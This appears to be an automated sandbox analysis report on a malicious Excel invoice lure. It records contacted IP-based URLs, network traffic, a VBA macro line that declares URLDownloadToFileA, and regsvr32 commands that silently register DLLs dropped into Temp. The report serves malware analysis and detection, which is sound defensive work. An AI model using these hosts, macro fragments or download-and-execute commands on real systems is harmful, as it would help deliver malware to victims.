Source: regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enn
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000002.00000002.2105222828.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2120262017.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2121003757.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2458603358.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2510481818.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2253344660.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 0000000F.00000002.2253526662.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2440450809.0000000001CB0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000009.00000002.2433149184.00000000003C1000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2447836285.00000000006E6000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/C
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/P
Source: regsvr32.exe, 00000011.00000002.2484294438.000000000051F000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/X
Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmpString found in binary or memory: https://194.225.58.214/Y
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100/_
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/&
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/XE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://198.57.200.100:3786/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: https://211.110.44.63:5353/8
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140/M
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140/T
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/7
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/C
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/JE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49314
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49228
Source: unknownHTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknownHTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmOLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmOLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmOLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmOLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\nnmumzom.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\kxwni.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\sxzjqf.dllJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmOLE, VBA macro line: Private Sub World_time_Print_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function World_time_Print_Layout
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal100.expl.evad.winXLSM@31/24@6/9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE3D9.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmVirustotal: Detection: 27%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE summary subject = by C.H. Robinson
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmInitial sample: OLE indicators vbamacros = False
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
